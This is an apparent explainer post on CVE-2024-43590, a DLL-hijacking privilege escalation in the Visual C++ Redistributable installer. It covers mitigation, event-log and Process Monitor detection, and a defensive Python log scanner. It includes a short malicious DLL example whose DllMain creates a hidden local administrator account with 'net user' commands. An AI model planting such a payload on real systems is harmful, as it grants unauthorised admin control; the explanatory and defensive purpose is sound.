CVE-2024-43590 - Visual C++ Redistributable Installer Elevation of Privilege Vulnerability Explained

---

What is CVE-2024-43590?

CVE-2024-43590 is a security flaw in Microsoft's Visual C++ Redistributable Installer, published in October 2024 (see the Timeline at the end of this page). It is classed as an Elevation of Privilege (EoP) vulnerability: a local attacker who already has a low-privileged account on the machine can use it to run code with administrator rights, bypassing the limitations of a normal user account.

Let’s break it down simply: installers often need elevated permissions (‘Run as Administrator’) to write to Program Files, the registry and system directories. If an elevated installer trusts files or directories that a normal user can modify, that user can hijack the elevated process and execute code with the installer's privileges.

Who Is Affected?

Any Windows machine on which the Microsoft Visual C++ Redistributable Installer is run is exposed. The risk is highest in enterprise environments, where the redistributable is deployed widely, bundled into third-party setup programs and re-run by developers, so a low-privileged user or a compromised account often has the opportunity to be present when it executes.

Exploit Details: How the Vulnerability Works

The exact root cause is not published here; the vulnerability is believed to relate to how the installer process handles file permissions and the loading of DLLs (Dynamic Link Libraries). The outline below describes the generic DLL-hijacking pattern that this class of installer flaw follows.

Here’s an outline of a typical attack:

1. Untrusted file path: The installer loads DLLs from a location a normal user can write to (e.g., %TEMP%, C:\Windows\Temp, or the Downloads folder it was launched from).
2. DLL hijacking: An attacker with low privileges drops a malicious DLL named after a library the installer expects (mylibrary.dll in this outline) into that path before the installation starts.
3. Installer launched as Admin: When the Visual C++ Redistributable Installer runs elevated (as an administrator via UAC, or as SYSTEM when pushed by a software deployment tool), it loads the attacker’s DLL and executes its code with those rights.

This technique is called DLL hijacking (also DLL preloading or search-order hijacking); when the planted DLL sits next to a legitimate executable it is also referred to as DLL sideloading.

Example: Pseudocode of a Simple Exploit

Imagine the installer loads example.dll from a directory the attacker can write to. Here’s a simplified demonstration of the payload DLL:

// Malicious example.dll loaded by the installer
#include <windows.h>
#include <stdlib.h>   // system()

// DllMain runs as soon as the elevated installer maps this DLL, so the
// payload inherits the installer's privileges. (DllMain executes under the
// loader lock; real-world payloads usually hand the work to a new thread to
// avoid deadlocks, but a direct system() call is enough to show the point.)
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    (void)hinstDLL;
    (void)lpReserved;
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH:
            // Malicious code executed with elevated privileges:
            // create a local account and make it an administrator.
            system("net user attacker Passwrd! /add");
            system("net localgroup administrators attacker /add");
            break;
    }
    return TRUE;
}

What this does:
If example.dll is loaded by the installer running as an administrator or SYSTEM, DllMain fires on process attach and quietly adds a new local administrator account. One practical caveat: if the installer links to specific functions in that DLL by name, the planted DLL must export them too, otherwise the loader rejects it before DllMain ever runs.

Mitigation and Patch

Microsoft has released updates that address CVE-2024-43590. Users should:
- Install all system and software updates via Windows Update, in particular the October 2024 security updates (the CVE was published on 10/08/2024; see the Timeline below).
- If you ship the Visual C++ runtime inside your own setup program, rebuild it with the updated redistributable package rather than the copy you bundled before the fix.
- Limit user permissions where possible: the attacker in this scenario needs only a low-privileged account plus write access to a directory the installer reads from.
- For sysadmins: rather than trying to strip write access from %TEMP% or C:\Windows\Temp (applications depend on it), stage installers in a directory that only administrators can write to, launch them from there, and monitor temp directories for .dll files that appear shortly before an installation.

Detection

Check the Security event log for suspicious account activity during a Visual C++ Redistributable installation: Event ID 4720 (a user account was created) and Event ID 4732 (a member was added to a security-enabled local group such as Administrators) are exactly the traces the payload above would leave. Also look for unexpected child processes (cmd.exe, net.exe, powershell.exe) whose parent is the installer.

For live response, use Sysinternals Process Monitor on the installer process: filter on the Load Image operation and look for DLLs loaded from outside C:\Windows and C:\Program Files, and look for CreateFile operations on .dll paths in user-writable directories that end in NAME NOT FOUND, which mark the spots where the installer would have picked up a planted DLL. For continuous monitoring across a fleet, Sysmon Event ID 7 (Image loaded) records the same DLL-load information.
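The Process Monitor check described above, as an added example that is not part of the original post and not a Microsoft or Sysinternals tool: a small Python script that scans a Procmon CSV export (File > Save, CSV format) for the two signs of a DLL hijack, a DLL actually loaded from a user-writable directory and a failed probe (CreateFile ending in NAME NOT FOUND) for a DLL in such a directory. The CSV rows are constructed for illustration; the installer process name (vc_redist.x64.exe) and the list of user-writable directory prefixes are assumptions to adjust for your environment.

```python
"""Flag DLL activity by an installer that points at a DLL hijack.

Reads a Process Monitor CSV export and reports, for one process name,
(a) DLLs it actually loaded from a user-writable directory and
(b) failed probes (CreateFile -> NAME NOT FOUND) for DLLs in such
directories, i.e. the exact spots where a planted DLL would be picked up.
"""
import csv
import io

# Assumption: these prefixes are writable by a low-privileged user. %TEMP%
# lives under the profile, so the whole of C:\Users is treated as writable.
WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\windows\\temp\\",
    "c:\\programdata\\",
)

# Assumption: the installer process is named vc_redist.x64.exe.
INSTALLER = "vc_redist.x64.exe"

# Constructed sample in Procmon's CSV export layout (not a real capture).
SAMPLE_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","vc_redist.x64.exe","4120","CreateFile","C:\\Users\\alice\\AppData\\Local\\Temp\\example.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","vc_redist.x64.exe","4120","Load Image","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Image Base: 0x7ff8c0000000"
"10:01:02.3","vc_redist.x64.exe","4120","Load Image","C:\\Users\\alice\\AppData\\Local\\Temp\\example.dll","SUCCESS","Image Base: 0x7ff8b0000000"
"10:01:02.4","explorer.exe","1234","Load Image","C:\\Users\\alice\\AppData\\Local\\Temp\\example.dll","SUCCESS","Image Base: 0x7ff8b0000000"
"10:01:02.5","vc_redist.x64.exe","4120","CreateFile","C:\\Windows\\Temp\\msvcp140.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.6","vc_redist.x64.exe","4120","CreateFile","C:\\Windows\\System32\\msvcp140.dll","SUCCESS","Desired Access: Read Attributes"
"""


def in_writable_dir(path: str) -> bool:
    """True if the path sits under a directory a normal user can write to."""
    p = path.lower()
    return any(p.startswith(prefix) for prefix in WRITABLE_PREFIXES)


def analyze(csv_text: str, process_name: str = INSTALLER) -> list:
    """Return (finding, path) pairs for DLL events of one process, in trace order."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or not in_writable_dir(path):
            continue
        op, result = row["Operation"], row["Result"]
        if op == "Load Image" and result == "SUCCESS":
            # Code from a user-writable location already ran in this process.
            findings.append(("LOADED_FROM_WRITABLE_DIR", path))
        elif op == "CreateFile" and result == "NAME NOT FOUND":
            # The installer looked here first and found nothing: a plantable slot.
            findings.append(("HIJACK_OPPORTUNITY", path))
    return findings


if __name__ == "__main__":
    for kind, path in analyze(SAMPLE_CSV):
        print(f"{kind:25} {path}")
```

Run it against a real export by replacing SAMPLE_CSV with the file contents; a HIJACK_OPPORTUNITY hit on an unpatched machine is the directory to protect, and a LOADED_FROM_WRITABLE_DIR hit during an installation is the point at which to pull the host for forensics.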

References & Further Reading

- Microsoft Security Update Guide: CVE-2024-43590
- DLL Hijacking Explained (Wikipedia)
- Sysinternals Suite

Final Thoughts

CVE-2024-43590 is a reminder that even trusted software installers can introduce risk, especially when interacting with system resources. Make sure your systems are patched and always double-check where you launch installers from. Stay vigilant and keep your systems updated!

Timeline

Published on: 10/08/2024 18:15:26 UTC
Last modified on: 10/13/2024 01:02:46 UTC